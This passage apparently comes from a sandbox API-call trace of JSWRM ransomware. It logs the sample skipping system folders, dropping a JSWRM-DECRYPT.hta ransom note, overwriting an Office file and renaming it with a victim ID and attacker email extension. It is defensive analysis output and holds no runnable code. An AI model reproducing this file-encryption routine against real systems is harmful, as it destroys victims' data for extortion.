(lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0129.667] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0129.667] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0129.667] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0129.667] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0129.667] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0129.667] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2412e0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0129.667] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0129.667] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241218, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0129.667] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43ef38bd, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x43ef38bd, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x43ef38bd, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x249270, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 0 [0129.667] FindClose (in: hFindFile=0x232240 | out: hFindFile=0x232240) returned 1 [0129.667] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43ef38bd, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x43ef38bd, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x43ef38bd, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x210866, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0129.667] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0129.667] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0129.667] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0129.667] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0129.667] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0129.667] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0129.667] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0129.667] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0129.667] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0129.668] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0129.668] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0129.668] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241100, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0129.668] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0129.668] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241268, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0129.668] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43ef38bd, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x43ef38bd, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x43ef38bd, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x210866, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 0 [0129.668] FindClose (in: hFindFile=0x232140 | out: hFindFile=0x232140) returned 1 [0129.668] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43ef38bd, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x43ef38bd, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x43ef38bd, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0129.668] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0129.668] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0129.668] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0129.668] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0129.668] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0129.668] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0129.668] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0129.668] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0129.668] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0129.668] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0129.668] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0129.668] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240fe8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0129.668] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0129.668] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241038, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0129.668] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43ef38bd, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x43ef38bd, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x43ef38bd, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 0 [0129.668] FindClose (in: hFindFile=0x232040 | out: hFindFile=0x232040) returned 1 [0129.669] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d91898, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1d91898, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4d40834, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x17dec0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="DRILLDWN.DLL", cAlternateFileName="")) returned 1 [0129.669] lstrcmpiW (lpString1="DRILLDWN.DLL", lpString2=".") returned 1 [0129.669] lstrcmpiW (lpString1="DRILLDWN.DLL", lpString2="..") returned 1 [0129.669] lstrcmpiW (lpString1="DRILLDWN.DLL", lpString2="...") returned 1 [0129.669] lstrcmpiW (lpString1="DRILLDWN.DLL", lpString2="windows") returned -1 [0129.669] lstrcmpiW (lpString1="DRILLDWN.DLL", lpString2="recovery") returned -1 [0129.669] lstrcmpiW (lpString1="DRILLDWN.DLL", lpString2="perflogs") returned -1 [0129.669] lstrcmpiW (lpString1="DRILLDWN.DLL", lpString2="documents and settings") returned 1 [0129.669] lstrcmpiW (lpString1="DRILLDWN.DLL", lpString2="$RECYCLE.BIN") returned 1 [0129.669] lstrcmpiW (lpString1="DRILLDWN.DLL", lpString2="system volume information") returned -1 [0129.669] lstrcmpiW (lpString1="DRILLDWN.DLL", lpString2="msocache") returned -1 [0129.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DRILLDWN.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0129.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DRILLDWN.DLL", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DRILLDWN.DLL", lpUsedDefaultChar=0x0) returned 12 [0129.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DRILLDWN.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0129.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DRILLDWN.DLL", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DRILLDWN.DLL", lpUsedDefaultChar=0x0) returned 12 [0129.669] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d91898, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1d91898, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x3e7feda, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x344a8, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="DWGCNV.DLL", cAlternateFileName="")) returned 1 [0129.669] lstrcmpiW (lpString1="DWGCNV.DLL", lpString2=".") returned 1 [0129.669] lstrcmpiW (lpString1="DWGCNV.DLL", lpString2="..") returned 1 [0129.669] lstrcmpiW (lpString1="DWGCNV.DLL", lpString2="...") returned 1 [0129.669] lstrcmpiW (lpString1="DWGCNV.DLL", lpString2="windows") returned -1 [0129.669] lstrcmpiW (lpString1="DWGCNV.DLL", lpString2="recovery") returned -1 [0129.669] lstrcmpiW (lpString1="DWGCNV.DLL", lpString2="perflogs") returned -1 [0129.669] lstrcmpiW (lpString1="DWGCNV.DLL", lpString2="documents and settings") returned 1 [0129.669] lstrcmpiW (lpString1="DWGCNV.DLL", lpString2="$RECYCLE.BIN") returned 1 [0129.669] lstrcmpiW (lpString1="DWGCNV.DLL", lpString2="system volume information") returned -1 [0129.669] lstrcmpiW (lpString1="DWGCNV.DLL", lpString2="msocache") returned -1 [0129.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DWGCNV.DLL", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0129.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DWGCNV.DLL", cchWideChar=10, lpMultiByteStr=0x345ef40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DWGCNV.DLL", lpUsedDefaultChar=0x0) returned 10 [0129.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DWGCNV.DLL", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0129.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DWGCNV.DLL", cchWideChar=10, lpMultiByteStr=0x345ef10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DWGCNV.DLL", lpUsedDefaultChar=0x0) returned 10 [0129.669] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d91898, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1d91898, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4e2564e, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x899050, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="DWGDP.DLL", cAlternateFileName="")) returned 1 [0129.670] lstrcmpiW (lpString1="DWGDP.DLL", lpString2=".") returned 1 [0129.670] lstrcmpiW (lpString1="DWGDP.DLL", lpString2="..") returned 1 [0129.670] lstrcmpiW (lpString1="DWGDP.DLL", lpString2="...") returned 1 [0129.670] lstrcmpiW (lpString1="DWGDP.DLL", lpString2="windows") returned -1 [0129.670] lstrcmpiW (lpString1="DWGDP.DLL", lpString2="recovery") returned -1 [0129.670] lstrcmpiW (lpString1="DWGDP.DLL", lpString2="perflogs") returned -1 [0129.670] lstrcmpiW (lpString1="DWGDP.DLL", lpString2="documents and settings") returned 1 [0129.670] lstrcmpiW (lpString1="DWGDP.DLL", lpString2="$RECYCLE.BIN") returned 1 [0129.670] lstrcmpiW (lpString1="DWGDP.DLL", lpString2="system volume information") returned -1 [0129.670] lstrcmpiW (lpString1="DWGDP.DLL", lpString2="msocache") returned -1 [0129.670] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DWGDP.DLL", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0129.670] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DWGDP.DLL", cchWideChar=9, lpMultiByteStr=0x345ef40, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DWGDP.DLL", lpUsedDefaultChar=0x0) returned 9 [0129.670] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DWGDP.DLL", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0129.670] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DWGDP.DLL", cchWideChar=9, lpMultiByteStr=0x345ef10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DWGDP.DLL", lpUsedDefaultChar=0x0) returned 9 [0129.670] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1beddbb, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1beddbb, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x1beddbb, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x374a8, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ELECTRICAL.VSL", cAlternateFileName="ELECTR~1.VSL")) returned 1 [0129.670] lstrcmpiW (lpString1="ELECTRICAL.VSL", lpString2=".") returned 1 [0129.670] lstrcmpiW (lpString1="ELECTRICAL.VSL", lpString2="..") returned 1 [0129.670] lstrcmpiW (lpString1="ELECTRICAL.VSL", lpString2="...") returned 1 [0129.670] lstrcmpiW (lpString1="ELECTRICAL.VSL", lpString2="windows") returned -1 [0129.670] lstrcmpiW (lpString1="ELECTRICAL.VSL", lpString2="recovery") returned -1 [0129.670] lstrcmpiW (lpString1="ELECTRICAL.VSL", lpString2="perflogs") returned -1 [0129.670] lstrcmpiW (lpString1="ELECTRICAL.VSL", lpString2="documents and settings") returned 1 [0129.670] lstrcmpiW (lpString1="ELECTRICAL.VSL", lpString2="$RECYCLE.BIN") returned 1 [0129.670] lstrcmpiW (lpString1="ELECTRICAL.VSL", lpString2="system volume information") returned -1 [0129.670] lstrcmpiW (lpString1="ELECTRICAL.VSL", lpString2="msocache") returned -1 [0129.670] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ELECTRICAL.VSL", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0129.670] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ELECTRICAL.VSL", cchWideChar=14, lpMultiByteStr=0x345ef40, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ELECTRICAL.VSL", lpUsedDefaultChar=0x0) returned 14 [0129.670] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ELECTRICAL.VSL", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0129.670] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ELECTRICAL.VSL", cchWideChar=14, lpMultiByteStr=0x345ef10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ELECTRICAL.VSL", lpUsedDefaultChar=0x0) returned 14 [0129.670] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.670] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.671] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ELECTRICAL.VSL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\electrical.vsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0129.675] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=226472) returned 1 [0129.675] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.675] ReadFile (in: hFile=0x45c, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345ec04*=0x27100, lpOverlapped=0x0) returned 1 [0129.687] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.687] WriteFile (in: hFile=0x45c, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345ec00*=0x27100, lpOverlapped=0x0) returned 1 [0129.688] CloseHandle (hObject=0x45c) returned 1 [0129.688] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ELECTRICAL.VSL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\electrical.vsl"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ELECTRICAL.VSL.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\electrical.vsl.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0129.689] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeda3d618, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeda3d618, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfb6c7584, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x25cc8, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="EMABLT32.DLL", cAlternateFileName="")) returned 1 [0129.689] lstrcmpiW (lpString1="EMABLT32.DLL", lpString2=".") returned 1 [0129.689] lstrcmpiW (lpString1="EMABLT32.DLL", lpString2="..") returned 1 [0129.689] lstrcmpiW (lpString1="EMABLT32.DLL", lpString2="...") returned 1 [0129.689] lstrcmpiW (lpString1="EMABLT32.DLL", lpString2="windows") returned -1 [0129.689] lstrcmpiW (lpString1="EMABLT32.DLL", lpString2="recovery") returned -1 [0129.689] lstrcmpiW (lpString1="EMABLT32.DLL", lpString2="perflogs") returned -1 [0129.689] lstrcmpiW (lpString1="EMABLT32.DLL", lpString2="documents and settings") returned 1 [0129.689] lstrcmpiW (lpString1="EMABLT32.DLL", lpString2="$RECYCLE.BIN") returned 1 [0129.689] lstrcmpiW (lpString1="EMABLT32.DLL", lpString2="system volume information") returned -1 [0129.689] lstrcmpiW (lpString1="EMABLT32.DLL", lpString2="msocache") returned -1 [0129.689] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EMABLT32.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0129.689] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EMABLT32.DLL", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EMABLT32.DLL", lpUsedDefaultChar=0x0) returned 12 [0129.689] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EMABLT32.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0129.689] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EMABLT32.DLL", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EMABLT32.DLL", lpUsedDefaultChar=0x0) returned 12 [0129.689] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xc7c80c48, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc7c80c48, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xdb141e15, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5d10a0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="EMSMDB32.DLL", cAlternateFileName="")) returned 1 [0129.689] lstrcmpiW (lpString1="EMSMDB32.DLL", lpString2=".") returned 1 [0129.689] lstrcmpiW (lpString1="EMSMDB32.DLL", lpString2="..") returned 1 [0129.689] lstrcmpiW (lpString1="EMSMDB32.DLL", lpString2="...") returned 1 [0129.689] lstrcmpiW (lpString1="EMSMDB32.DLL", lpString2="windows") returned -1 [0129.689] lstrcmpiW (lpString1="EMSMDB32.DLL", lpString2="recovery") returned -1 [0129.689] lstrcmpiW (lpString1="EMSMDB32.DLL", lpString2="perflogs") returned -1 [0129.689] lstrcmpiW (lpString1="EMSMDB32.DLL", lpString2="documents and settings") returned 1 [0129.689] lstrcmpiW (lpString1="EMSMDB32.DLL", lpString2="$RECYCLE.BIN") returned 1 [0129.690] lstrcmpiW (lpString1="EMSMDB32.DLL", lpString2="system volume information") returned -1 [0129.690] lstrcmpiW (lpString1="EMSMDB32.DLL", lpString2="msocache") returned -1 [0129.690] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EMSMDB32.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0129.690] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EMSMDB32.DLL", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EMSMDB32.DLL", lpUsedDefaultChar=0x0) returned 12 [0129.690] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EMSMDB32.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0129.690] WideCharToMultiByte (in: 